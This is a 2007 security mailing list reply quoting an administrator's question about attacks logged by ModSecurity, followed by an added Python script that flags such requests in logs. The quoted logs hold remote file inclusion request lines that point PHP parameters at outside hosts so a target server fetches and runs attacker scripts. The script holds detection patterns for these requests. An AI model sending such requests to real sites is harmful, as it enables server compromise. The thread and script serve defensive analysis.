RE: PHP web exploit/vulnerability
From: David Gutierrez <davegu1 () hotmail com>
Date: Tue, 23 Oct 2007 12:16:54 -0500
Feel free to post it or send me a copy via email.
----------------------------------------
> Date: Tue, 23 Oct 2007 11:29:47 -0500
> From: colea () sunset com mx
> To: security-basics () securityfocus com
> Subject: PHP web exploit/vulnerability
>
> Hello everyone,
>
> I'm sorry if this is a stupid question, but I just wanted your input,
> maybe direct me to some links, another mail list, or whatever you might
> add would be highly appreciated; we have modsecurity installed on our
> server, and it has been logging many attacks like the following:
>
> GET /content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://beach.tsv-dettingen.de/admin/ec.txt? HTTP/1.1
>
> GET /index.php?option=com_%3Cwbr%20//mambots/*.php?mosConfig_absolute_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1
>
> GET /index.php?option=http://0x0134.lan.io/pb.php? HTTP/1.1
>
> I managed to get a copy of the php script which these attacks try to
> force the server to execute, I could post it here if that is correct and
> anybody could take a look at it and help me out a little to understand
> what it's trying to do.
>
> Any help is appreciated, thanks in advance.
>
> Camilo Olea
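Added example, not part of the original thread: a small log triage script that flags request lines shaped like the ones quoted above, where a query parameter carries a URL or text in the format of Unix `id` output. The function names and the `remote.example` host are assumptions made for illustration; the sample lines are constructed, modelled on the requests in the post.

```python
import re
from urllib.parse import parse_qsl

# A parameter value that is itself a URL: the shape of a remote file inclusion attempt.
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
# Text in the format printed by the Unix `id` command (uid=N(name) gid=N(name) ...).
ID_OUTPUT = re.compile(r"uid=\d+\([^)]*\)\s+gid=\d+\([^)]*\)")

# Constructed sample request lines; remote.example is a placeholder host.
SAMPLE_REQUESTS = [
    "GET /content/multithumb/class.img2thumb.inc"
    "?mosConfig_absolute_path=http://remote.example/ec.txt? HTTP/1.1",
    "GET /index.php?option=com_%3Cwbr%20//mambots/*.php?mosConfig_absolute_path="
    "uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1",
    "GET /index.php?option=http://remote.example/pb.php? HTTP/1.1",
    "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1",  # benign
]


def classify_request(request_line):
    """Return a list of (parameter, finding) pairs for one HTTP request line."""
    parts = request_line.split()
    if len(parts) < 2:
        return []  # not a parsable request line
    # Everything after the first '?' is the query string, even if it
    # contains further '?' characters as these requests do.
    _, _, query = parts[1].partition("?")
    findings = []
    # parse_qsl percent-decodes names and values, so encoded payloads are seen in clear.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_URL.match(value):
            findings.append((name, "remote-url-in-parameter"))
        if ID_OUTPUT.search(value):
            findings.append((name, "id-command-output"))
    return findings


def flagged(request_lines):
    """Return only the request lines that produced at least one finding."""
    return {line: hits for line in request_lines if (hits := classify_request(line))}


if __name__ == "__main__":
    for line, hits in flagged(SAMPLE_REQUESTS).items():
        print(hits, "<-", line)
```
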